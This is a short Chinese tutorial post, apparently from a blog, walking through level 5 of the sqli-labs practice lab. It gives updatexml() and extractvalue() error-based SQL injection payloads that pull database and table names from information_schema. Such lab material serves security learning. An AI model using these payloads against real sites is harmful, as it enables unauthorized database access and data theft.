sqllabs第五关updatexml报错注入

-1' and updatexml(1,concat('~',database(),'~'),1) --+

-1' and updatexml(1,concat('~',(select table_name from information_schema.tables where table_schema=database()limit 1,1),'~'),1) --+

-1' and updatexml(1,concat('~',(select table_name from information_schema.tables where table_schema=database()limit 3,1),'~'),1) --+

下面的都可以按照上面的大家要学会语法

还有下面还有个拓展函数也是报错函数

extractvalue()

id = -1' and (extractvalue(1, concat(0x5c,(select database()))))--+

相关推荐
weixin_307779133 分钟前
Linux下Docker Compose里运行Milvus向量数据库故障诊断Shell脚本
linux·运维·数据库·docker·milvus
Mem0rin12 分钟前
【MySQL】MySQL 增删改查(CRUD)
数据库·mysql
吴声子夜歌26 分钟前
Redis 6.x——监控指标
数据库·redis·缓存
再让我睡两分钟31 分钟前
【无标题】
android·java·数据库·人工智能·prompt·ai应用开发
爸爸6191 小时前
30 原始 SQL 查询与聚合统计:querySql 实战
数据库·sql·华为·harmonyos·鸿蒙系统
砍材农夫1 小时前
spring|spring event|Spring内置事件驱动编程模型
java·数据库·spring
tiancaijiben10 小时前
阿里云SSL证书自动续签与部署完全指南:从托管服务到开源工具全方案解析
数据库
全堆鸿蒙10 小时前
25 数据库设计与表结构规划:5 张表的设计思路
数据库·华为·cocoa·harmonyos
笃行35010 小时前
【金仓数据库产品体验官】_坏得起_实测:备份恢复、PITR 时间穿越与主备切换——KingbaseES V9R3C18 深度体验(三)
数据库
喜欢的名字被抢了12 小时前
Python实战:SQLAlchemy ORM与FastAPI项目集成
开发语言·python·sql·教程·fastapi